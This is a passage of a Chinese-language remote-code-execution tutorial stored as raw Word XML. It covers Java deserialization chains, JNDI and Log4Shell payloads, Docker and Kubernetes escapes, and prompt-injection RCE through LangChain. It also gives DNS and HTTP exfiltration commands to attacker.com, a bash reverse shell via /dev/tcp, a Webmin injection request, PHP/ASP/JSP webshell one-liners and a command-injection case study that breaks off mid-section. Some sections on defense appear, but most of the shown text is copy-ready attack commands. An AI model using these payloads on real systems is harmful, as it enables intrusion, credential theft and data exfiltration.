          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**找入口类**：实现 Serializable，readObject 可控（如 PriorityQueue, HashMap）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**找调用链**：寻找 invoke/exec/eval 触发点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**构造利用**：通过反射设置私有字段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**CommonsCollections1 链**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ObjectInputStream.readObject()</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -&gt; AnnotationInvocationHandler.readObject()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    -&gt; TransformedMap.checkSetValue()</w:t>
        <w:br/>
        <w:t xml:space="preserve">      -&gt; ChainedTransformer.transform()</w:t>
        <w:br/>
        <w:t xml:space="preserve">        -&gt; InvokerTransformer.transform()</w:t>
        <w:br/>
        <w:t xml:space="preserve">          -&gt; Runtime.exec()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 JNDI 注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker.com/#Exploit" 1389</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发 Payload：`${jndi:ldap://attacker.com:1389/a}`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[!] JDK 8u191+ 默认禁用远程类加载，需结合 Tomcat EL/Groovy 等本地 Gadget 绕过。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八、反序列化漏洞高级利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**Gadget Chain 构造**：如 Ysoserial 自动生成 CommonsCollections 等链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**ClassLoader 绕过**：绕过限制加载自定义恶意类</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**内存马注入**：通过反序列化在内存中注入 WebShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 PHP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**魔术方法滥用**：`__wakeup()`, `__destruct()`, `__call()`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**POP 链构造**：面向属性编程，利用多类相互作用触发代码执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**绕过反序列化保护**：利用 PHP 对象序列化格式特性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九、云原生与容器 RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 Docker 逃逸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**特权模式逃逸**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ls -la /dev | grep -i sda</w:t>
        <w:br/>
        <w:t>mkdir /tmp/host_root &amp;&amp; mount /dev/sda1 /tmp/host_root</w:t>
        <w:br/>
        <w:t>chroot /tmp/host_root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**Socket 挂载逃逸**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker -H unix:///var/run/docker.sock run -it -v /:/host --privileged --net=host ubuntu chroot /host bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**Capabilities 逃逸 (CAP_SYS_ADMIN)**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mkdir /tmp/cgrp &amp;&amp; mount -t cgroup -o rdma cgroup /tmp/cgrp &amp;&amp; mkdir /tmp/cgrp/x</w:t>
        <w:br/>
        <w:t>echo 1 &gt; /tmp/cgrp/x/notify_on_release</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 K8s 集群 RCE 横向</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)</w:t>
        <w:br/>
        <w:t>curl -k -H "Authorization: Bearer $TOKEN" https://10.96.0.1/api/v1/namespaces/default/pods</w:t>
        <w:br/>
        <w:t>curl -k -H "Authorization: Bearer $TOKEN" https://10.96.0.1/api/v1/namespaces/default/secrets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十、新兴技术攻击面 (AI/LLM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 Prompt 注入导致 RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LangChain PythonREPLTool 未做输入过滤时：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>from langchain.tools import PythonREPLTool</w:t>
        <w:br/>
        <w:t>tool = PythonREPLTool()</w:t>
        <w:br/>
        <w:t>tool.run("__import__('os').system('id')")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 AI 供应链投毒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>torch.load('model.pth')  # pickle 反序列化，触发 __reduce__ 执行代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[!] Hugging Face 上的 `.pkl` / `.pickle` / `.joblib` 格式模型需警惕。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 AI 辅助自动化利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者用 LLM 生成绕过 Payload，防御方用 LLM 检测混淆的 `eval`/`system` 调用。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十一、工具链</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.1 DNS 外带（Interactsh）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest</w:t>
        <w:br/>
        <w:t>interactsh-client</w:t>
        <w:br/>
        <w:t># Payload: curl http://abc123.oast.site/$(whoami)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.2 JNDI-Injection-Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.1.1/6666 0&gt;&amp;1'" -A 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.3 Gopherus（SSRF 到 RCE）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git clone https://github.com/tarunkant/Gopherus.git &amp;&amp; python2 Gopherus.py</w:t>
        <w:br/>
        <w:t># 选择 Redis -&gt; PHPShell -&gt; 输入目标 Web 路径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十二、盲 RCE 数据外带</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># DNS 外带</w:t>
        <w:br/>
        <w:t>curl http://$(id | base64 | tr -d '=' | tr '/+' '_-').oast.site</w:t>
        <w:br/>
        <w:br/>
        <w:t># HTTP 外带</w:t>
        <w:br/>
        <w:t>curl -d "$(cat /etc/passwd)" http://attacker.com/exfil</w:t>
        <w:br/>
        <w:br/>
        <w:t># 时间延迟判断</w:t>
        <w:br/>
        <w:t>ping -c 5 127.0.0.1 &amp;&amp; sleep 5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十三、经典漏洞案例分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.1 Log4Shell (CVE-2021-44228)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>发布时间：2021年11月</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>影响范围：Log4j 2.0-beta9 至 2.14.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVSS：10.0（最严重级别）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**原理**：攻击者通过操纵日志消息触发 JNDI 查找，加载远程恶意 Java 类执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>${jndi:ldap://attacker-server.com/exploit}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**影响**：被称为"互联网历史上最严重的漏洞"，影响数百万应用程序，国家级黑客组织迅速开发利用工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**防御**：升级 Log4j 2.15.0+，设置 `-Dlog4j2.formatMsgNoLookups=true`，部署 WAF 拦截 `${jndi:`。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.2 Struts2 OGNL (CVE-2017-5638)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>发布时间：2017年3月</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>影响范围：Struts2 2.3.5-2.3.31, 2.5-2.5.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVSS：9.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**原理**：攻击者通过修改 Content-Type 头触发 OGNL 表达式注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**影响**：Equifax 数据泄露，1.47亿用户信息泄露，经济损失超10亿美元。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.3 Webmin (CVE-2019-15107)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**原理**：password_change.cgi 中 old 参数过滤不严。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -k -X POST https://target:10000/password_change.cgi -d 'user=root&amp;pam=&amp;expired=2&amp;old=id&amp;new1=test&amp;new2=test'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关键参数：`expired=2` 必须设置，`old=[command]` 为注入点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>13.4 HTTP 头漏洞探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -I http://target.com/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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>特征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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>潜在漏洞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Server: Apache/2.4.49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CVE-2021-41773（路径遍历+RCE）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X-Powered-By: PHP/5.x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多个历史漏洞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X-AspNet-Version: 4.x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ASP.NET 反序列化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Server: nginx/1.6.2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Nginx 解析漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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十四、一句话木马与 WebShell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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>语言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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>木马代码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PHP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`&lt;?php @eval($_POST['cmd']);?&gt;`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PHP 短标签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`&lt;?=system($_GET['cmd']);?&gt;`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ASP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`&lt;%eval request("cmd")%&gt;`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JSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4703"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>`&lt;%Runtime.getRuntime().exec(request.getParameter("cmd"));%&gt;`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[!] 蚁剑/菜刀工作原理：木马存在 -&gt; 加密指令 HTTP 请求 -&gt; eval() 执行 -&gt; 返回结果。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十五、防御方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.1 代码层防御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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>风险点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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>防御措施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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>示例代码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命令执行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参数化+禁用 shell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`subprocess.run(['ping','-c','4',ip], shell=False)`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代码执行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禁用 eval/exec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Python: `ast.literal_eval()`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SSTI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沙箱模板引擎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Jinja2: `sandbox.Environment()`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反序列化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JSON 替代二进制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Java: `ObjectInputFilter`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.2 系统层防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最小权限配置：Web 应用运行在权限受限的用户下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>安全补丁管理：及时安装补丁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>系统强化：禁用不必要服务，配置防火墙</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.3 WAF 防护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>启用 RCE 特定规则（命令注入、代码注入、反序列化）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>自定义规则根据应用程序特性配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>机器学习增强的 WAF 自动学习攻击模式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十六、POC vs EXP 方法论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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>维度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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>POC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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EXP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目的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证明漏洞存在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利用漏洞获取利益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危险性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低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高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交付物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验证脚本/报告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/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>自动化攻击工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[!] 企业渗透测试中使用 POC 验证，禁止直接使用 EXP。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十七、总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**零信任输入**：永远不信任用户输入，实施严格验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**最小权限**：应用、容器、AI Agent 均以最小权限运行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**纵深防御**：WAF + RASP + 网络隔离 + 日志监控</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[!] SSTI 先猜模板类型，Java 反序列化先用 URLDNS 探测，Docker 逃逸先看 --privileged 和 /var/run/docker.sock，企业测试用 POC 不用 EXP。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>实战案例：从命令注入到域控接管</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>场景描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>某企业对外提供的主机检测工具存在命令执行漏洞。功能点是输入IP地址进行ping连通性测试，后端直接将用户输入拼接到 `ping -c 4 {input}` 中执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>阶段一：发现与探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**发现**：在搜索框中输入 IP 后返回 ping 结果，响应速度不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 输入正常 IP</w:t>
        <w:br/>
        <w:t>192.168.1.1</w:t>
        <w:br/>
        <w:br/>
        <w:t># 响应：PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.</w:t>
        <w:br/>
        <w:t># 正常返回结果，约3秒</w:t>
        <w:br/>
        <w:br/>
        <w:t># 测试特殊字符</w:t>
        <w:br/>
        <w:t>192.168.1.1; sleep 5</w:t>
        <w:br/>
        <w:br/>
        <w:t># 响应：页面卡顿约5秒后返回 -&gt; 存在命令注入！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**探测**：确定注入点类型和过滤情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 测试命令分隔符</w:t>
        <w:br/>
        <w:t>192.168.1.1; id              # 有回显，返回 uid=33(www-data)</w:t>
        <w:br/>
        <w:t>192.168.1.1 &amp;&amp; whoami        # 也成功</w:t>
        <w:br/>
        <w:t>192.168.1.1 | id             # 也成功</w:t>
        <w:br/>
        <w:br/>
        <w:t># 测试过滤</w:t>
        <w:br/>
        <w:t>192.168.1.1; cat /etc/passwd  # 发现 cat 被过滤 -&gt; ccaatt 绕过</w:t>
        <w:br/>
        <w:br/>
        <w:t># URL 编码测试</w:t>
        <w:br/>
        <w:t>192.168.1.1%3Bid             # 也成功，说明 WAF 没拦编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>阶段二：漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**DNS 外带确认**（怕反弹 Shell 被拦截，先用外带确认连通性）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
